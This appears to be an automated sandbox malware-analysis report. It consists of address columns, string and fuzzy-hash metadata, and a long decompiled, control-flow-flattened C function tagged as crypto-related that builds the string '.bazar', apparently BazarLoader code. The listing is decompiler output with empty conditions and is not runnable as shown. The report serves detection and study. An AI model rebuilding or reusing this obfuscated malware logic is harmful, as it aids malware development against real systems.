                                                                                                                                                        0x012e2d08
                                                                                                                                                        0x012e2a61
                                                                                                                                                        0x012e2a66
                                                                                                                                                        0x012e3067
                                                                                                                                                        0x012e3075
                                                                                                                                                        0x012e307b
                                                                                                                                                        0x012e3081
                                                                                                                                                        0x012e3088
                                                                                                                                                        0x012e3093
                                                                                                                                                        0x012e30a4
                                                                                                                                                        0x012e2a6c
                                                                                                                                                        0x012e2a71
                                                                                                                                                        0x012e30b1
                                                                                                                                                        0x012e30b9
                                                                                                                                                        0x012e30c1
                                                                                                                                                        0x012e30c9
                                                                                                                                                        0x012e30d7
                                                                                                                                                        0x012e30db
                                                                                                                                                        0x012e2a77
                                                                                                                                                        0x012e2a7c
                                                                                                                                                        0x012e2a86
                                                                                                                                                        0x012e2a8d
                                                                                                                                                        0x012e2a95
                                                                                                                                                        0x012e2ab3
                                                                                                                                                        0x012e2ab8
                                                                                                                                                        0x012e2ac2
                                                                                                                                                        0x012e2ac5
                                                                                                                                                        0x012e2ac5
                                                                                                                                                        0x012e2a7c
                                                                                                                                                        0x012e2a71
                                                                                                                                                        0x012e2a66
                                                                                                                                                        0x012e2885
                                                                                                                                                        0x012e288a
                                                                                                                                                        0x012e2bd8
                                                                                                                                                        0x012e314a
                                                                                                                                                        0x012e3150
                                                                                                                                                        0x012e3155
                                                                                                                                                        0x012e2bde
                                                                                                                                                        0x012e2be3
                                                                                                                                                        0x012e2bed
                                                                                                                                                        0x012e2bf1
                                                                                                                                                        0x012e2c06
                                                                                                                                                        0x012e2c06
                                                                                                                                                        0x012e2be3
                                                                                                                                                        0x012e2890
                                                                                                                                                        0x012e2895
                                                                                                                                                        0x012e2e2f
                                                                                                                                                        0x012e2e34
                                                                                                                                                        0x012e2e39
                                                                                                                                                        0x012e289b
                                                                                                                                                        0x012e28a0
                                                                                                                                                        0x012e2e62
                                                                                                                                                        0x012e2e6b
                                                                                                                                                        0x012e2e77
                                                                                                                                                        0x012e2e7b
                                                                                                                                                        0x012e2e8e
                                                                                                                                                        0x012e2e94
                                                                                                                                                        0x012e2e9a
                                                                                                                                                        0x012e2ea1
                                                                                                                                                        0x012e2eb4
                                                                                                                                                        0x012e2eba
                                                                                                                                                        0x012e2ec0
                                                                                                                                                        0x012e2ec9
                                                                                                                                                        0x012e2ece
                                                                                                                                                        0x012e2ed9
                                                                                                                                                        0x012e2edf
                                                                                                                                                        0x012e2ee5
                                                                                                                                                        0x012e2eee
                                                                                                                                                        0x012e2ef3
                                                                                                                                                        0x012e2f0e
                                                                                                                                                        0x012e28a6
                                                                                                                                                        0x012e28ab
                                                                                                                                                        0x012e28b1
                                                                                                                                                        0x012e28b6
                                                                                                                                                        0x012e28b6
                                                                                                                                                        0x012e28ab
                                                                                                                                                        0x012e28a0
                                                                                                                                                        0x012e2895
                                                                                                                                                        0x012e288a
                                                                                                                                                        0x012e287f

                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.368911222.00000000012D1000.00000020.00000001.sdmp, Offset: 012D0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.368893013.00000000012D0000.00000002.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.368940818.00000000012E4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.368999147.00000000012E7000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: "M|!$"M|!$38_L$48_L$48_L$48_L$[Xv$[Xv$[Xv$9nh$9nh
                                                                                                                                                        • API String ID: 0-2075110066
                                                                                                                                                        • Opcode ID: 765c22a38420b95fe16b9e48a6412e05268682151b1bc7b6b3c4bc17f22e7a3a
                                                                                                                                                        • Instruction ID: ada986325eb7b6098927189ba2ce5022949daf1fa7db722c5db13d7aa8bb022e
                                                                                                                                                        • Opcode Fuzzy Hash: 765c22a38420b95fe16b9e48a6412e05268682151b1bc7b6b3c4bc17f22e7a3a
                                                                                                                                                        • Instruction Fuzzy Hash: AF52E2323286D1C6DB74CB19E8947AE67A4F788B50F50451AEB8EC7B98DF78C442CB11
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 012D6537, Relevance: 13.6, Strings: 10, Instructions: 1095COMMONCrypto
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 71%
                                                                                                                                                        			E012D6537(void* __edx, unsigned long long __rcx, signed long long __rdx, long long __r9, void* __r11) {
				intOrPtr _v464;
				char _v468;
				char _v472;
				signed long long _v480;
				long long _v488;
				void* _v496;
				void* _v504;
				unsigned int* _v512;
				signed long long _v520;
				signed long long _v528;
				void* _v536;
				void* _v544;
				long long _v552;
				void* _v560;
				void* _v568;
				void* _v576;
				long long _v584;
				void* _v592;
				void* _v600;
				void* _v608;
				intOrPtr _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v632;
				long long _v640;
				void* _v648;
				void* _v656;
				void* _v664;
				signed long long _v672;
				void* _v680;
				void* _v688;
				void* _v696;
				void* _v704;
				void* _v712;
				unsigned long long _v720;
				signed long long _v728;
				signed long long _v736;
				void* _v744;
				void* _v752;
				void* _v760;
				signed int _v764;
				long long _v768;
				intOrPtr _v772;
				unsigned int _v776;
				intOrPtr _v780;
				char _v784;
				char _v788;
				signed int _v792;
				signed int _v796;
				intOrPtr _v800;
				intOrPtr _v804;
				char _v808;
				signed long long _v816;
				intOrPtr _v817;
				char _v821;
				signed int _v832;
				unsigned int* _v840;
				signed int _v844;
				signed int _v848;
				intOrPtr _v852;
				intOrPtr _v856;
				signed long long _v860;
				intOrPtr _v864;
				unsigned int _v868;
				unsigned long long _v872;
				char _v873;
				char _v875;
				void* _v888;
				signed short _v890;
				short _v892;
				void* _v904;
				unsigned int _v905;
				char _v906;
				char _v907;
				char _v908;
				char _v909;
				intOrPtr _v928;
				signed long long _v936;
				signed int _t368;
				signed int _t417;
				signed long long _t450;
				void* _t473;
				void* _t497;
				signed int _t503;
				signed int _t532;
				signed int _t572;
				unsigned int _t596;
				signed int _t600;
				unsigned long long _t632;
				signed long long _t640;
				short* _t644;
				signed long long _t706;
				unsigned long long _t707;
				signed long long _t721;
				void* _t723;
				void* _t726;

				_t726 = __r11;
				_t725 = __r9;
				_t721 = __rdx;
				_t707 = __rcx;
				_t723 =  &_v904;
				_v568 = __r9;
				_v906 = r8b;
				_v696 = __rcx + 0xc;
				_v576 = __rcx + 0x218;
				_v584 = __rcx + 0x10;
				_t600 =  !=  ? 0xf8d80d50 : 0xf3bb400e;
				r15d = 0x5d3f2d89;
				_t363 =  !=  ? r15d : 0xf8c794ac;
				_v612 =  !=  ? r15d : 0xf8c794ac;
				r15d =  ==  ? 0xa6dbf53a : r15d;
				_t603 =  <  ? 0x902c474f : 0x4721b862;
				_v616 =  <  ? 0x902c474f : 0x4721b862;
				_t605 =  <  ? 0xa6dbf53a : 0xfdcb4e26;
				_v620 =  <  ? 0xa6dbf53a : 0xfdcb4e26;
				_v592 = __rcx + 0x240;
				_t589 =  ==  ? 0x4591200e : 0x727b8f2a;
				_v624 =  ==  ? 0x4591200e : 0x727b8f2a;
				r13d = 0xe84fe95c;
				r13d =  <  ? 0x1cfee6ca : r13d;
				r14d = 0x87afab9e;
				r14d =  <=  ? 0x7ff9f897 : r14d;
				_v600 = __rcx + 0x238;
				_v704 = __rcx + 0x24c;
				_v608 = __rcx + 0x248;
				_v752 = __rcx + 0x254;
				_v760 = __rcx + 8;
				_v488 = __rcx + 0x259;
				_v904 = __rcx;
				_t632 = __rcx + 0x258;
				_v712 = _t632;
				_v868 = 0x7ff9f897;
				_v728 = _t632;
				_v720 = _t632;
				_t368 = 0xa26d3c93;
				while(1) {
					_t503 = _t368;
					if(_t368 <= 0x12c2784) {
					}
					L2:
					if(_t503 > 0xad7f3ccf) {
						if(_t503 > 0xd55faea1) {
							if(_t503 <= 0xeee9c934) {
								if(_t503 <= 0xe84fe95b) {
									if(_t503 == 0xd55faea2) {
										_t368 =  ==  ? 0x873106d2 : 0xa4415a4b;
									} else {
										_t368 = _t503;
										if(_t503 == 0xd97c734e) {
											_t707 = _v872;
											 *((char*)(_t723 + _t707 + 0x93)) =  *((intOrPtr*)(_v736 + _t640));
											_v800 = _v872 + 1;
											_t368 = 0x62146214;
										}
									}
									while(1) {
										_t503 = _t368;
										if(_t368 <= 0x12c2784) {
										}
										goto L2;
									}
								}
								if(_t503 == 0xe84fe95c) {
									_t707 = _v904;
									 *((char*)(_t707 + 0x258)) = _v906;
									 *((intOrPtr*)(_t707 + 0x250)) = 0;
									 *((intOrPtr*)(_t707 + 8)) = 0;
									 *((long long*)(_t707 + 0x248)) = 1;
									_t368 = 0xc538f3c7;
									while(1) {
										_t503 = _t368;
										if(_t368 <= 0x12c2784) {
										}
										goto L2;
									}
								}
								if(_t503 == 0xe87f8cad) {
									_v909 = _v868;
									_t368 =  ==  ? 0xa1550a50 : 0x83ffe87a;
									while(1) {
										_t503 = _t368;
										if(_t368 <= 0x12c2784) {
										}
										goto L10;
									}
									goto L2;
								}
								_t368 = _t503;
								if(_t503 == 0xeec8a184) {
									_t640 = _v568;
									_t707 = _v904;
									 *_t707 = _t640;
									L143:
									_t368 = 0xc538f3c7;
								}
								continue;
							} else {
								if(_t503 > 0xf8d80d4f) {
									if(_t503 == 0xf8d80d50) {
										_t721 = _v760;
										_t334 = _t640 + 1; // 0xc3c975e0
										 *_t721 = _t334;
										_t640 = _v696;
										_v816 = _t640;
										_t368 =  <  ? 0x6c161dc6 : 0x6e65093f;
									} else {
										if(_t503 == 0xfa2adb82) {
											_t707 = _v640;
											_t721 = _v496;
											_t368 =  ==  ? 0x9cc1af46 : 0x90031297;
										} else {
											_t368 = _t503;
											if(_t503 == 0xfdcb4e26) {
												_t368 = _v616;
											}
										}
									}
								} else {
									if(_t503 == 0xeee9c935) {
										_t596 = 4;
										r8d = 0x8955631f;
										r9d = 0x189;
										E012DFAD7(4, _t600, _t640, _t707);
										_t721 =  &_v472;
										 *_t640();
										_t640 = _v544;
										 *_t640 = 1;
										_t368 = 0x97ba314b;
									} else {
										if(_t503 == 0xf3bb400e) {
											_t640 = _v608;
											_t368 =  ==  ? 0x82b867c6 : 0x74e12cd6;
										} else {
											_t368 = _t503;
											if(_t503 == 0xf8c794ac) {
												 *_v712 = 0;
												 *_v760 = 0;
												 *_v752 = 0;
												_t640 = _v568;
												_t368 =  ==  ? 0x75019ba8 : 0xeec8a184;
											}
										}
									}
								}
								while(1) {
									_t503 = _t368;
									if(_t368 <= 0x12c2784) {
									}
									goto L2;
								}
							}
						}
						if(_t503 <= 0xc1df8fb4) {
							if(_t503 <= 0xb4b38c1e) {
								if(_t503 == 0xad7f3cd0) {
									_t450 = E012DC51A(_t707);
									_t721 = _t450;
									_t640 = _t721 * 0xf2b9d649 >> 0x20;
									_t596 = _t596 - ((_t450 + _t596 >> 0xb) + (_t450 + _t596 >> 0x1f)) * 0x870;
									_v728 = _t721;
									_t368 = 0x7f365e09;
								} else {
									_t368 = _t503;
									if(_t503 == 0xb1cd874d) {
										 *_v752 = 0;
										_t640 = _v552;
										 *_t640 = 0;
										_t368 = 0xa574e944;
									}
								}
							} else {
								if(_t503 == 0xb4b38c1f) {
									 *_v840 = 2;
									 *_v744 = 0;
									_t640 = _v904;
									_t596 = 1;
									r8d = 0x7e1a74f1;
									r9d = 0x2f;
									E012DFAD7(1, _t600, _t640, _t707);
									 *_t640();
									_t368 = 0xd55faea2;
								} else {
									if(_t503 == 0xb75c2336) {
										_v680 = _v704;
										_t640 = _v680;
										_t368 =  ==  ? 0x95091900 : 0x34ddbdbe;
									} else {
										_t368 = _t503;
										if(_t503 == 0xc04800cb) {
											_t368 =  ==  ? 0x1bd2d9df : 0x514370c2;
											_v908 = _v909;
										}
									}
								}
							}
							continue;
						}
						if(_t503 > 0xc4b668ea) {
							if(_t503 == 0xc4b668eb) {
								_t721 = _v904;
								 *_t721 =  *((intOrPtr*)( *((intOrPtr*)(_t721 + 0x220)) + _t707 * 8));
								_t640 = _v744;
								_t707 = _v744;
								 *_t707 =  *_t640 + 1;
								L198:
								_t368 = 0x53bce5ed;
								r12b = 1;
								continue;
							}
							if(_t503 == 0xc538f3c7) {
								_v905 = bpl;
								_t368 = _v624;
							} else {
								_t368 = _t503;
								if(_t503 == 0xc6fd976d) {
									 *_v840 = 3;
									 *_v528 = 0;
									_t640 = _v904;
									_t596 = 1;
									r8d = 0x7e1a74f1;
									r9d = 0x2f;
									E012DFAD7(1, _t600, _t640, _t707);
									 *_t640();
									_t368 = 0xa4415a4b;
								}
							}
						} else {
							if(_t503 == 0xc1df8fb5) {
								_v796 = 0;
								_t368 = 0x8c01f6ea;
							} else {
								if(_t503 == 0xc2927316) {
									E012DCDB9(0x21c0, _t640);
									_v520 = _t640;
									_t640 = _v520;
									_v480 = _t640;
									_t368 = 0xea11413;
									_v808 = 0;
								} else {
									_t368 = _t503;
									if(_t503 == 0xc3c975df) {
										_t640 = _v816;
										_t368 =  >  ? 0xa67110d8 : 0xc538f3c7;
									}
								}
							}
						}
						continue;
					}
					if(_t503 > 0x97ba314a) {
						if(_t503 <= 0xa4415a4a) {
							if(_t503 <= 0xa1550a4f) {
								if(_t503 == 0x97ba314b) {
									L178:
									_t368 = 0x94958caf;
									continue;
								}
								_t368 = _t503;
								if(_t503 == 0x9cc1af46) {
									_v788 = _v768 + 1;
									_t368 = 0x782ba57;
								}
							} else {
								if(_t503 == 0xa1550a50) {
									_v784 = 0;
									_t368 = 0xc04800cb;
								} else {
									_t368 = r14d;
									if(_t503 != 0xa26d3c93) {
										_t368 = _t503;
										if(_t503 == 0xa32a0313) {
											 *_v760 = 0;
											_v544 = _v488;
											_t640 = _v544;
											_t368 =  ==  ? 0xeee9c935 : 0x97ba314b;
										}
									}
								}
							}
							continue;
						}
						if(_t503 > 0xa6dbf539) {
							_t368 = _t600;
							if(_t503 == 0xa6dbf53a) {
								continue;
							}
							if(_t503 == 0xaaa69421) {
								E012DCDB9(0x26, _t640);
								_t707 =  *_v888;
								 *(_t707 + _t721 * 8) = _t640;
								_v804 = _v856 + 1;
								_t368 = 0x4a668043;
								continue;
							}
							_t368 = _t503;
							if(_t503 != 0xad742835) {
								continue;
							}
							_t598 = r15d;
							r15d = r12d;
							r13d = _t600;
							r12d = r14d;
							r14d = r13d;
							_v817 = sil;
							_t497 = E012DC55D(_t640,  &_v821) + 0xffffffee;
							_t473 = E012DC55D(_t640,  &_v875);
							r8d = 0xc;
							r8d = r8d - _t473;
							_v472 = sil;
							_v468 = 0x3453b36b;
							_v464 = 0x5061f96b;
							if(_v472 != sil) {
								L118:
								_t707 = _v672;
								_t721 =  &_v468;
								r9d = _t497;
								E012E020E(_t640, _t707, _t721, _t724, _t725);
								_v648 = _v600;
								 *_v648 = 0x870;
								_v888 = _v592;
								_t640 = _v888;
								_t368 =  ==  ? 0x2ccb8bda : 0xc2927316;
								r14d = r12d;
								_t600 = r13d;
								r13d = r14d;
								r12d = r15d;
								r15d = _t598;
								continue;
							}
							do {
								_t572 =  *(_t723 + 0x1f4 + _t640 * 4);
								_t596 =  !_t572 & 0x50619d4e;
								 *(_t723 + 0x1f4 + _t640 * 4) = _t572 & 0xaf9e62b1 | _t596;
							} while (_t640 == 0);
							goto L118;
						}
						if(_t503 == 0xa4415a4b) {
							_t640 = _v840;
							_t368 =  ==  ? 0xb75c2336 : 0x280f3889;
							continue;
						}
						if(_t503 == 0xa574e944) {
							L38:
							_t368 = 0xc538f3c7;
							bpl = 1;
							continue;
						}
						_t368 = _t503;
						if(_t503 != 0xa67110d8) {
							continue;
						} else {
							 *_v752 = 0;
							_t640 = _v712;
							 *_t640 = 0;
							goto L38;
						}
					}
					if(_t503 > 0x8c01f6e9) {
						if(_t503 > 0x902c474e) {
							if(_t503 == 0x902c474f) {
								_v552 = _v712;
								_t368 =  ==  ? 0xa574e944 : 0xb1cd874d;
							} else {
								if(_t503 == 0x94958caf) {
									_v688 = _v752;
									_t640 = _v688;
									E012D64D6( *_t640, _t640);
									_t368 = 0xaa8668a;
								} else {
									_t368 = _t503;
									if(_t503 == 0x95091900) {
										E012DCDB9(7, _t640);
										_v672 = _t640;
										E012DCDB9(0x18, _t640);
										_v736 = _t640;
										_t706 = _v736;
										_t598 = r12d;
										r12d = 0;
										r8d = 0xc87545ea;
										r9d = 0xcb;
										E012DFAD7(1, _t600, _t640, _t707);
										_v936 = _t706;
										_v928 = 0x18;
										r8d = 0;
										r9d = 0;
										 *_t640();
										_v664 =  &_v875;
										_t644 = _v664;
										 *(_t644 + 2) = r12b;
										 *_t644 = 0;
										_v656 =  &_v821;
										_t640 = _v656;
										_v720 = _t707;
										 *(_t640 + 4) = r12b;
										 *_t640 = 0;
										_t368 = 0x844b3ff6;
									}
								}
							}
						} else {
							if(_t503 == 0x8c01f6ea) {
								_v764 = _v796;
								_v632 = _v764;
								_t640 = _v640;
								_t707 = _v632;
								_v890 =  *(_t640 + _t707 * 2) & 0x0000ffff;
								_t368 =  ==  ? 0x5903be2d : 0x5ffd86ff;
							} else {
								if(_t503 == 0x8efa67b7) {
									_t368 = 0x782ba57;
									_v788 = 0;
								} else {
									_t368 = _t503;
									if(_t503 == 0x90031297) {
										_v868 = 0;
										_t368 = 0xe87f8cad;
									}
								}
							}
						}
					} else {
						if(_t503 <= 0x844b3ff5) {
							if(_t503 == 0x82b867c6) {
								_v560 = _v760;
								_v780 =  *_v560;
								_t368 =  <  ? 0x6f81883a : 0x74e12cd6;
							} else {
								_t368 = _t503;
								if(_t503 == 0x83ffe87a) {
									_v784 = 0x13;
									_t368 = 0xc04800cb;
								}
							}
						} else {
							if(_t503 == 0x844b3ff6) {
								_t640 = _v720;
								_v860 = _t368;
								_t368 =  <  ? 0x564692ca : 0x6ecf8e8e;
							} else {
								if(_t503 == 0x873106d2) {
									_v536 = _v584;
									_t724 =  *((intOrPtr*)(_v904 + 0x230));
									_t640 = _v704;
									_v528 = _t640;
									_t725 = _v536;
									_t707 = _v528;
									E012D6118(_t503,  *((intOrPtr*)(_v904 + 0x228)), _t598, _t707,  *((intOrPtr*)(_v904 + 0x230)), _v536);
									_t368 =  !=  ? 0x12c2785 : 0xc6fd976d;
								} else {
									_t368 = _t503;
									if(_t503 == 0x87afab9e) {
										_t368 = _v620;
									}
								}
							}
						}
					}
					continue;
					L10:
					if(_t503 > 0x514370c1) {
						if(_t503 <= 0x6745e6b6) {
							if(_t503 > 0x574d588e) {
								if(_t503 <= 0x5d3f2d88) {
									if(_t503 == 0x574d588f) {
										 *_v816 = 0x1b7740;
										_t368 = 0xc3c975df;
									} else {
										_t368 = _t503;
										if(_t503 == 0x5903be2d) {
											_t721 = _v904;
											 *((short*)( *((intOrPtr*)( *((intOrPtr*)(_t721 + 0x220)) + _v832 * 8)) + _v632 * 2)) = 0;
											_t640 = _v832;
											_v772 =  *_t640;
											_t707 = _v832;
											 *_t707 = _v772 + 1;
											_t368 =  <  ? 0x52e2fcd6 : 0x49d13f87;
										}
									}
									continue;
								}
								if(_t503 == 0x5d3f2d89) {
									goto L143;
								} else {
									if(_t503 == 0x5ffd86ff) {
										_t640 =  *((intOrPtr*)( *((intOrPtr*)(_v904 + 0x220)) + _v832 * 8));
										_t707 = _v632;
										_t596 = _v890 & 0x0000ffff;
										 *(_t640 + _t707 * 2) = _t596;
										_v796 = _v764 + 1;
										_t368 = 0x8c01f6ea;
									} else {
										_t368 = _t503;
										if(_t503 == 0x62146214) {
											_v872 = _v800;
											_t368 =  <  ? 0xd97c734e : 0xad742835;
										}
									}
									continue;
								}
							}
							if(_t503 <= 0x53bce5ec) {
								if(_t503 == 0x514370c2) {
									_t368 =  ==  ? 0xc1df8fb5 : 0x52e2fcd6;
									continue;
								}
								_t368 = _t503;
								if(_t503 != 0x52e2fcd6) {
									continue;
								}
								L201:
								r12b = 1;
								_t368 = 0x53bce5ed;
								continue;
							}
							if(_t503 == 0x53bce5ed) {
								r12b = r12b & 0x00000001;
								return r12d;
							} else {
								_t368 = _t503;
								if(_t503 == 0x564692ca) {
									_t640 = _v860;
									_t707 = _v736;
									 *((char*)(_t723 + _t640 + 0x5d)) =  *((intOrPtr*)(_t707 + _t640));
									_v720 = _t640;
									_t368 = 0x844b3ff6;
								}
								continue;
							}
						}
						if(_t503 <= 0x727b8f29) {
							if(_t503 <= 0x6e65093e) {
								if(_t503 == 0x6745e6b7) {
									_t640 = _v696;
									_t596 = 1;
									r8d = 0x7e1a74f1;
									r9d = 0x2f;
									E012DFAD7(1, _t600, _t640, _t707);
									 *_t640();
									goto L201;
								}
								_t368 = _t503;
								if(_t503 != 0x6c161dc6) {
									continue;
								}
								_t640 = _v816;
								L142:
								 *_t640 = 0xea60;
								goto L143;
							}
							if(_t503 == 0x6e65093f) {
								_v864 =  *_v816 +  *_v816;
								_t640 = _v816;
								 *_t640 = _v864;
								_t368 =  >  ? 0x9213403 : 0xc3c975df;
								continue;
							}
							if(_t503 == 0x6ecf8e8e) {
								_v873 = 0;
								_t368 = 0x62146214;
								_v800 = 0;
								continue;
							}
							_t368 = _t503;
							if(_t503 != 0x6f81883a) {
								continue;
							} else {
								_t707 = _v560;
								 *_t707 = _v780 + 1;
								_t640 = _v696;
								goto L142;
							}
						}
						if(_t503 > 0x7cdb6e3c) {
							if(_t503 == 0x7cdb6e3d) {
								E012DCC2E(_t640, _v520);
								E012DCC2E(_t640, _v672);
								_t707 = _v736;
								E012DCC2E(_t640, _t707);
								_t640 = _v664;
								_t368 = 0x34ddbdbe;
							} else {
								if(_t503 == 0x7f365e09) {
									_v848 = _t368;
									_v512 = (_v848 << 2) + _v480;
									_t640 = _v512;
									_t368 =  ==  ? 0x1b18ea96 : 0x8729393;
								} else {
									_t368 = _t503;
									if(_t503 == 0x7ff9f897) {
										_t368 = r13d;
									}
								}
							}
							continue;
						}
						if(_t503 == 0x727b8f2a) {
							_t368 =  ==  ? 0x6745e6b7 : 0xa32a0313;
							continue;
						}
						if(_t503 == 0x74e12cd6) {
							goto L38;
						}
						_t368 = _t503;
						if(_t503 != 0x75019ba8) {
							continue;
						} else {
							goto L38;
						}
					}
					if(_t503 > 0x21790be6) {
						if(_t503 <= 0x2fe22761) {
							if(_t503 <= 0x280f3888) {
								if(_t503 == 0x21790be7) {
									 *_v840 = 1;
									_t640 = _v680;
									 *_t640 = 0;
									_t596 = 1;
									r8d = 0x7e1a74f1;
									r9d = 0x2f;
									E012DFAD7(1, _t600, _t640, _t707);
									 *_t640();
									 *((intOrPtr*)(_v904 + 0x250)) = 0x1b7740;
									_t368 = 0x280f3889;
								} else {
									_t368 = _t503;
									if(_t503 == 0x23069f92) {
										_t368 = 0x53bce5ed;
										r12d = 0;
									}
								}
								continue;
							}
							if(_t503 == 0x280f3889) {
								_t640 = _v688;
								_t707 = _v688;
								 *_t707 =  *_t640 + 1;
								goto L178;
							} else {
								if(_t503 == 0x2b3e96a7) {
									_t368 = 0xc2927316;
								} else {
									_t368 = _t503;
									if(_t503 == 0x2ccb8bda) {
										E012DCDB9(0x4380, _t640);
										_t707 = _v888;
										 *_t707 = _t640;
										_t368 = 0x4a668043;
										_v804 = 0;
									}
								}
								continue;
							}
						}
						if(_t503 > 0x4721b861) {
							_t368 = r15d;
							if(_t503 != 0x4721b862) {
								if(_t503 == 0x49d13f87) {
									_t640 = _v832;
									 *_t640 = _v772;
									_t368 = 0x52e2fcd6;
								} else {
									_t368 = _t503;
									if(_t503 == 0x4a668043) {
										_v856 = _v804;
										_t640 = _v648;
										_t368 =  <  ? 0xaaa69421 : 0x2b3e96a7;
									}
								}
							}
							continue;
						}
						if(_t503 == 0x2fe22762) {
							_v844 = _v792;
							_v832 = _v576;
							_t640 = _v832;
							_t368 =  <  ? 0x8efa67b7 : 0x514370c2;
							_v908 = _v907;
							continue;
						}
						if(_t503 == 0x34ddbdbe) {
							_v640 = _v584;
							_v504 = _v640;
							_t724 =  *_v592;
							_t640 = _v600;
							_t596 =  *_t640;
							_t707 = _v680;
							_t725 = _v504;
							E012D6118(_t503, _t596, _t598, _t707,  *_v592, _v504);
							_t368 =  !=  ? 0xf200fb5 : 0x21790be7;
							continue;
						}
						_t368 = _t503;
						if(_t503 != 0x4591200e) {
							continue;
						} else {
							goto L198;
						}
					}
					if(_t503 <= 0xaa86689) {
						if(_t503 <= 0x782ba56) {
							if(_t503 == 0x12c2785) {
								_t640 = _v536;
								_t707 = _v904;
								 *_t707 = _t640;
								goto L198;
							}
							_t368 = _t503;
							if(_t503 == 0x73cf00c) {
								_v744 = _v704;
								_t640 = _v744;
								_v776 =  *_t640;
								_t707 = _v576;
								_t368 =  <  ? 0xc4b668eb : 0xb4b38c1f;
							}
						} else {
							if(_t503 == 0x782ba57) {
								_v768 = _v788;
								_t640 =  *((intOrPtr*)( *((intOrPtr*)(_v904 + 0x220)) + _v844 * 8));
								_v496 = _v768;
								_t707 = _v496;
								_v892 =  *(_t640 + _t707 * 2) & 0x0000ffff;
								_t368 =  ==  ? 0xe87f8cad : 0xfa2adb82;
								_v868 = 1;
							} else {
								if(_t503 == 0x8729393) {
									_t417 = _v848;
									_t532 = _t417 + 0x3f1;
									_t707 = _t532 * 0xf2b9d649 >> 0x20;
									_t596 = _t532 + _t417 + 0x3f1 >> 0x1f;
									_v728 = _t640;
									_t368 = 0x7f365e09;
								} else {
									_t368 = _t503;
									if(_t503 == 0x9213403) {
										_t368 =  <  ? 0x574d588f : 0xc3c975df;
									}
								}
							}
						}
					} else {
						if(_t503 > 0x1b18ea95) {
							if(_t503 == 0x1b18ea96) {
								_t707 =  *((intOrPtr*)( *_v888 + _t706 * 8));
								_t721 = _v672;
								r8d = _v848;
								E012D5EF8( *_v888, _t707, _t721, _t724, _t726);
								 *_v512 = 1;
								 *((short*)( *((intOrPtr*)( *_v888 + _t706 * 8)) + 0x18)) = 0x2e;
								 *((short*)( *((intOrPtr*)( *_v888 + _t706 * 8)) + 0x1a)) = 0x62;
								 *((short*)( *((intOrPtr*)( *_v888 + _t706 * 8)) + 0x1c)) = 0x61;
								 *((short*)( *((intOrPtr*)( *_v888 + _t706 * 8)) + 0x1e)) = 0x7a;
								 *((short*)( *((intOrPtr*)( *_v888 + _t706 * 8)) + 0x20)) = 0x61;
								_t640 =  *((intOrPtr*)( *_v888 + _t706 * 8));
								 *((short*)(_t640 + 0x22)) = 0x72;
								_v808 = _v852 + 1;
								_t368 = 0xea11413;
							} else {
								if(_t503 == 0x1bd2d9df) {
									_v792 = _v844 + 1;
									_v907 = _v909;
									_t368 = 0x2fe22762;
								} else {
									_t368 = _t503;
									if(_t503 == 0x1cfee6ca) {
										_t368 = _v612;
									}
								}
							}
						} else {
							if(_t503 == 0xaa8668a) {
								_v840 = _v608;
								_t640 = _v840;
								_t368 =  ==  ? 0x73cf00c : 0xd55faea2;
							} else {
								if(_t503 == 0xea11413) {
									_v852 = _v808;
									_t640 = _v648;
									_t368 =  <  ? 0xad7f3cd0 : 0x7cdb6e3d;
								} else {
									_t368 = _t503;
									if(_t503 == 0xf200fb5) {
										_t640 = _v504;
										_t707 = _v904;
										 *_t707 = _t640;
										_t368 = 0x2fe22762;
										_v792 = 0;
									}
								}
							}
						}
					}
				}
			}




































































































                                                                                                                                                        0x012d6537
                                                                                                                                                        0x012d6537
                                                                                                                                                        0x012d6537
                                                                                                                                                        0x012d6537
                                                                                                                                                        0x012d6543
                                                                                                                                                        0x012d654a
                                                                                                                                                        0x012d6552
                                                                                                                                                        0x012d655b
                                                                                                                                                        0x012d656a
                                                                                                                                                        0x012d6576
                                                                                                                                                        0x012d658b
                                                                                                                                                        0x012d6596
                                                                                                                                                        0x012d659c
                                                                                                                                                        0x012d65a0
                                                                                                                                                        0x012d65af
                                                                                                                                                        0x012d65bd
                                                                                                                                                        0x012d65c0
                                                                                                                                                        0x012d65cf
                                                                                                                                                        0x012d65d2
                                                                                                                                                        0x012d65e0
                                                                                                                                                        0x012d65f4
                                                                                                                                                        0x012d65f7
                                                                                                                                                        0x012d6603
                                                                                                                                                        0x012d6609
                                                                                                                                                        0x012d6612
                                                                                                                                                        0x012d6618
                                                                                                                                                        0x012d6623
                                                                                                                                                        0x012d6632
                                                                                                                                                        0x012d6641
                                                                                                                                                        0x012d6650
                                                                                                                                                        0x012d665c
                                                                                                                                                        0x012d666b
                                                                                                                                                        0x012d6673
                                                                                                                                                        0x012d6678
                                                                                                                                                        0x012d667f
                                                                                                                                                        0x012d6687
                                                                                                                                                        0x012d668b
                                                                                                                                                        0x012d6693
                                                                                                                                                        0x012d669b
                                                                                                                                                        0x012d66a0
                                                                                                                                                        0x012d66a0
                                                                                                                                                        0x012d66a7
                                                                                                                                                        0x012d66a7
                                                                                                                                                        0x012d66a9
                                                                                                                                                        0x012d66af
                                                                                                                                                        0x012d678b
                                                                                                                                                        0x012d68e2
                                                                                                                                                        0x012d6bb7
                                                                                                                                                        0x012d7145
                                                                                                                                                        0x012d7b08
                                                                                                                                                        0x012d714b
                                                                                                                                                        0x012d714b
                                                                                                                                                        0x012d7153
                                                                                                                                                        0x012d716d
                                                                                                                                                        0x012d7172
                                                                                                                                                        0x012d717f
                                                                                                                                                        0x012d7186
                                                                                                                                                        0x012d7186
                                                                                                                                                        0x012d7153
                                                                                                                                                        0x012d66a0
                                                                                                                                                        0x012d66a0
                                                                                                                                                        0x012d66a7
                                                                                                                                                        0x012d66a7
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d66a7
                                                                                                                                                        0x012d66a0
                                                                                                                                                        0x012d6bc3
                                                                                                                                                        0x012d7689
                                                                                                                                                        0x012d768e
                                                                                                                                                        0x012d7696
